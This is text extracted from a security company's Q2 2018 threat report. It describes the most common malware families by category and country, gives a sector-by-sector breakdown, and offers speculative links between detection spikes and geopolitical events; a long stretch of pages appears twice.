Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
